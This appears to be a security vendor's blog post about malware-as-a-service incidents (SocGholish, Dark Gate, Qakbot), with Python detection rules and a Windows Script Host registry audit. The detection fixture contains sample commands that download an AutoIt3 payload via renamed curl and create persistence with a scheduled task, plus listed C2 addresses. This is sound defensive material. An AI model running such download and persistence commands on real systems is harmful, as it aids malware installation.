Between November 27 and December 04, 2024, Blackpoint’s Security Operations Center (SOC) responded to 522 total incidents across on-premises, Microsoft 365, and Google Workspace protected environments. Throughout November 2024, Blackpoint’s SOC responded to several alerts related to multiple Malware-as-a-Service (MaaS) variants.
In this blog, we’ll dive into these observations, why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.
Malware-as-a-Service (MaaS)
Topline Takeaways
- Industry target:
- Consumer Cyclicals
- Industrials
- Institutions & Organizations
- Professional & Commercial Services
- Real Estate
- Blackpoint SOC actions:
- Isolated impacted devices
- Contacted partner
- Attacker methods:
- JavaScript files
- Wscript to run scheduled tasks
- Recommended mitigations:
- Minimize or restrict the use of scripting languages.
- Employ least-privilege access controls.
- Regularly audit both environment and endpoints.
Incident Timelines
Over the previous 30 days, Blackpoint’s SOC has routinely thwarted incidents in which threat actors attempted to deploy malware-as-a-service (MaaS) variants – SocGholish, Gootloader, Qakbot, and Dark Gate. On November 22, 2024, we covered threat hunting activities conducted by Blackpoint’s SOC related to Gootloader infections. Blackpoint’s SOC was able to successfully remove these threats and work alongside partners to mitigate malicious activity and remove malware-related persistence mechanisms.
SocGholish
In early November 2024, Blackpoint’s SOC conducted threat hunting to search for suspicious JavaScript files being executed from web browser processes, a trend that Blackpoint’s SOC has been observing. While conducting the threat hunt, Blackpoint’s SOC observed a device of an industrials partner running a wscript.exe process with JavaScript files. Additionally, Blackpoint’s SOC identified a network callout from wscript.exe to an IP address, 205.185.119[.]10, which has been linked to SocGholish command and control (C2) servers.
In early November 2024, Blackpoint’s MDR technology alerted our SOC to the execution of a suspicious JavaScript file that was downloaded and executed on the host of an institutions & organizations partner. Additionally, Blackpoint’s SOC identified remote connections to an IP address, 88.119.175[.]152, which has been linked to SocGholish campaigns.
In mid-November 2024, Blackpoint’s MDR technology alerted to suspicious PowerShell executions on the host of a real estate partner. Upon investigation, Blackpoint’s SOC identified a malicious PowerShell command that called out to a domain to install and execute a .svg file, which is indicative of SVG smuggling – a known technique utilized by SocGholish malware. Additional analysis revealed that the threat actor also installed AsyncRAT and utilized BOINC as a C2 server. Blackpoint’s SOC isolated impacted machines to avoid additional malicious behavior and potential lateral movement.
Dark Gate
In mid-November 2024, Blackpoint’s MDR technology alerted to the execution of a JavaScript file, which was located within a downloaded .zip file, on the host of a professional & commercial services partner. The first step of the malware’s kill chain was to copy curl.exe to a temp folder and rename the binary. Curl was then used to download a fake PDF file, intended to social engineer the user into thinking they had opened a legitimate file. Curl was finally used to download a .a3x file, an AutoIt3 script meant to add an encrypted registry value on the host. The registry value was meant to be injected into a legitimate process. The result was a callout to the threat actor’s infrastructure. Blackpoint’s SOC isolated the affected host to prevent lateral movement and worked with the partner to remove persistence mechanisms.
In late November 2024, Blackpoint’s MDR technology alerted to the execution of a JavaScript file, again located within a downloaded .zip file on the host of a real estate partner. The malware’s kill chain was nearly identical to the incident above. Blackpoint’s SOC did not observe any signs of lateral movement or further compromise, and the affected host was isolated.
Qakbot
In late November 2024, Blackpoint’s MDR technology alerted to suspicious PowerShell activity on the host of a professional & commercial services partner. Analysis of the alert found that a TvMusic.vbs file was the source of the alert. The file was located in the user’s music folder. When the .vbs file was executed, it read the text contents of C:\Users\Public\Music\TvMusic.music, executed those contents in memory, and created two scheduled tasks, TvMusic and TvMusic2. This activity is consistent with Qakbot infections. Blackpoint’s SOC isolated the affected host and removed malicious persistence mechanisms.
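The three incident patterns above (a script host running a downloaded .js/.vbs file and calling out to a known SocGholish address, a renamed curl.exe fetching a fake PDF and an AutoIt3 .a3x script, and a .vbs creating scheduled tasks) can be expressed as a handful of rules over endpoint telemetry. The following is an added example written for this post, not Blackpoint’s detection logic: field names follow Sysmon Event ID 1 (process create) and Event ID 3 (network connect), the events are constructed, and the only real indicators are the two C2 addresses quoted in the SocGholish write-ups above.

```python
"""Detection rules for the script-host, renamed-curl and schtasks patterns
described above, run over constructed Sysmon-style events (added example)."""
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")

# C2 addresses named in the SocGholish write-ups above, kept defanged here
# and refanged only for comparison against telemetry.
SOCGHOLISH_C2 = {"205.185.119[.]10", "88.119.175[.]152"}


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")


def _base(path):
    """Lower-cased file name of a Windows path (empty string if missing)."""
    return PureWindowsPath(path).name.lower() if path else ""


def _script_arg(cmd: str):
    """First command-line token ending in a Windows Script Host extension."""
    for tok in cmd.replace('"', " ").split():
        if tok.endswith(SCRIPT_EXTS):
            return tok
    return None


def detect(events):
    """Return (rule, detail) tuples for every suspicious event."""
    c2 = {refang(ip) for ip in SOCGHOLISH_C2}
    findings = []
    for ev in events:
        img = _base(ev.get("Image"))
        parent = _base(ev.get("ParentImage"))
        cmd = ev.get("CommandLine", "").lower()
        if ev["EventID"] == 1:
            # SocGholish / Qakbot: script host handed a .js/.vbs/... file;
            # rated higher when a browser is the parent (download-and-run).
            script = _script_arg(cmd)
            if img in SCRIPT_HOSTS and script:
                sev = "high" if parent in BROWSERS else "medium"
                findings.append(("script_host_exec",
                                 f"{sev}: {img} ran {script} (parent {parent or 'unknown'})"))
            # Qakbot: script host creating scheduled tasks for persistence.
            if parent in SCRIPT_HOSTS and img == "schtasks.exe" and "/create" in cmd:
                findings.append(("script_host_schtasks", f"{parent} created a task: {cmd}"))
            # Dark Gate: curl.exe copied and renamed; the PE's OriginalFileName
            # still says curl.exe. Also flag AutoIt3 .a3x downloads by curl.
            ofn = (ev.get("OriginalFileName") or "").lower()
            if ofn == "curl.exe":
                if img != "curl.exe":
                    findings.append(("renamed_curl", f"{ev['Image']} is curl.exe under another name"))
                if ".a3x" in cmd:
                    findings.append(("autoit_download", f"curl fetched an AutoIt3 script: {cmd}"))
        elif ev["EventID"] == 3 and img in SCRIPT_HOSTS:
            # Script hosts rarely need the network; a known C2 removes all doubt.
            dst = ev.get("DestinationIp", "")
            rule = "script_host_known_c2" if dst in c2 else "script_host_network"
            findings.append((rule, f"{img} connected to {dst}"))
    return findings


# Constructed sample telemetry (not from the original incidents).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\Update.js"'},
    {"EventID": 3, "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "205.185.119.10", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Users\bob\AppData\Local\Temp\sys.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"sys.exe -o C:\Users\bob\AppData\Local\Temp\invoice.pdf http://example.invalid/invoice.pdf"},
    {"EventID": 1, "Image": r"C:\Users\bob\AppData\Local\Temp\sys.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"sys.exe -o C:\Users\bob\AppData\Local\Temp\script.a3x http://example.invalid/script.a3x"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\Public\Music\TvMusic.vbs"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'schtasks.exe /create /tn TvMusic /tr "wscript.exe C:\Users\Public\Music\TvMusic.vbs" /sc minute /mo 5'},
    # Benign noise that must not fire.
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.5", "DestinationPort": 443},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Two design points worth keeping when porting these rules to a SIEM: the renamed-curl rule keys on the PE's OriginalFileName rather than the path, because the attacker controls the file name but not the embedded version resource; and any outbound connection from wscript.exe or cscript.exe is worth a ticket on its own, since the known-C2 match only raises the priority of a detection that should already exist.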
More About MaaS
Malware-as-a-Service (MaaS) is a business model used by malicious actors: much as organizations subscribe to software-as-a-service (SaaS), threat actors can purchase or rent malware variants for use in cyberattacks. MaaS operators often advertise their variants, and accesses they have already obtained, on cybercriminal forums. Threat actors then have the option of paying for access to the malware variant itself, to launch their own campaigns, or paying for victim access that has already been achieved.
Threat actors likely find this type of service attractive because it allows actors of all skill levels to conduct malicious activity, reduces the work required for malware operations such as ransomware, and offers a wide array of capabilities, including:
- Stealing sensitive information, including credentials
- Gaining persistent access to targeted victims
- Deploying other malware payloads, including information stealers and ransomware
- Sophisticated defense evasion techniques
The MaaS model results in malware variants being distributed by multiple threat actors and groups, which can make post-incident attribution more difficult. These operations highlight the need for in-depth, proactive security solutions.
APG Threat Analysis for MaaS Variants
Blackpoint’s Adversary Pursuit Group (APG) predicts the continued use of MaaS operations over the next 12 months.
This assessment is supported by incidents observed by Blackpoint’s SOC, which include the use of Dark Gate, Qakbot, and more throughout 2024, as well as external reporting detailing the use of MaaS variants. In August of 2024, ReliaQuest researchers reported that SocGholish and Gootloader accounted for 90% of infections they observed in 2024.
Additionally, DarkTrace researchers reported that in the first half of 2024 MaaS operations were a prevalent threat to their customers.
Mitigations
- Minimize the use of – or implement strict controls on – scripting languages, as threat actors often rely on scripting languages, such as JavaScript, to deploy malware and conduct malicious activities.
- Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions.
- Regularly audit both environment and endpoints to identify potential rogue applications and potential old/unused accounts that should be removed.
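The first and third mitigations meet in one concrete check: the Windows Script Host “Enabled” value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings (a REG_DWORD of 0 disables wscript.exe and cscript.exe machine-wide) and the Shell\Open\Command handlers for the JSFile, JSEFile, VBSFile, VBEFile, WSFFile and WSHFile ProgIDs (pointing them at notepad.exe stops a double-clicked .js or .vbs from executing). The script below is an added example, not Blackpoint’s tooling: it parses the text produced by `reg export` and reports which of these controls are still in the weak default state. The two snapshots are constructed; the registry paths are real Windows locations, and reading the live registry or exporting the keys is assumed to happen outside the script.

```python
"""Audit a 'reg export' snapshot for the Windows Script Host and script
file-association controls (added example; snapshots are constructed)."""
import re

WSH_KEY = r"hkey_local_machine\software\microsoft\windows script host\settings"
SCRIPT_PROGIDS = ("JSFile", "JSEFile", "VBSFile", "VBEFile", "WSFFile", "WSHFile")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def parse_reg_export(text):
    """Parse 'reg export' text into {key_path_lower: {value_name_lower: value}}.
    Handles dword and string values, which is all these checks need."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            reg.setdefault(key, {})
            continue
        if key is None:
            continue
        name, _, data = line.partition("=")
        name = "(default)" if name == "@" else name.strip('"').lower()
        if data.startswith("dword:"):
            value = int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            value = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \" and \\ escaping
        else:
            value = data
        reg[key][name] = value
    return reg


def audit(reg_text):
    """Return one finding per control; status is 'weak', 'ok' or 'unknown'."""
    reg = parse_reg_export(reg_text)
    findings = []
    # An absent Enabled value means WSH is on, so default to 1, not 0.
    enabled = reg.get(WSH_KEY, {}).get("enabled", 1)
    findings.append({"check": "wsh_enabled",
                     "status": "ok" if enabled == 0 else "weak",
                     "detail": f"Windows Script Host Enabled={enabled}"})
    for progid in SCRIPT_PROGIDS:
        key = ("hkey_classes_root\\" + progid + "\\shell\\open\\command").lower()
        cmd = reg.get(key, {}).get("(default)")
        if cmd is None:
            status, detail = "unknown", f"{progid}: no open command in export"
        elif any(h in cmd.lower() for h in SCRIPT_HOSTS):
            status, detail = "weak", f"{progid} opens with {cmd}"
        else:
            status, detail = "ok", f"{progid} opens with {cmd}"
        findings.append({"check": f"handler_{progid}", "status": status, "detail": detail})
    return findings


def weak_checks(reg_text):
    return [f["check"] for f in audit(reg_text) if f["status"] == "weak"]


# Constructed snapshot of the default (weak) state: WSH on, .js/.vbs run by wscript.
WEAK_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000001

[HKEY_CLASSES_ROOT\JSFile\Shell\Open\Command]
@="\"%SystemRoot%\\System32\\WScript.exe\" \"%1\" %*"

[HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command]
@="\"%SystemRoot%\\System32\\WScript.exe\" \"%1\" %*"
"""

# Constructed hardened counterpart: WSH disabled, every script ProgID opens in notepad.
NOTEPAD_HANDLER = r'@="\"%SystemRoot%\\System32\\notepad.exe\" \"%1\""'
HARDENED_EXPORT = "\n".join(
    ["Windows Registry Editor Version 5.00", "",
     r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings]",
     '"Enabled"=dword:00000000', ""]
    + [line for p in SCRIPT_PROGIDS
       for line in ("[HKEY_CLASSES_ROOT\\" + p + "\\Shell\\Open\\Command]", NOTEPAD_HANDLER, "")]
)

if __name__ == "__main__":
    for label, snapshot in (("weak", WEAK_EXPORT), ("hardened", HARDENED_EXPORT)):
        print(label, weak_checks(snapshot))
```

Two caveats when applying this in a real environment: the same Enabled value also exists under HKEY_CURRENT_USER, and the script only audits the machine-wide key; and disabling WSH or remapping the ProgIDs will break any logon or management scripts that legitimately use wscript.exe or cscript.exe, so inventory those first and roll the change out in audit mode before enforcing it.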
Conclusion
These incidents underscore the evolving tactics of threat actors and highlight the importance of layered defenses. By leveraging Blackpoint’s MDR technology and following these mitigation strategies, you can bolster your organization’s defenses against these types of attacks. Reach out to Blackpoint’s SOC team for tailored recommendations on how to enhance your cybersecurity posture.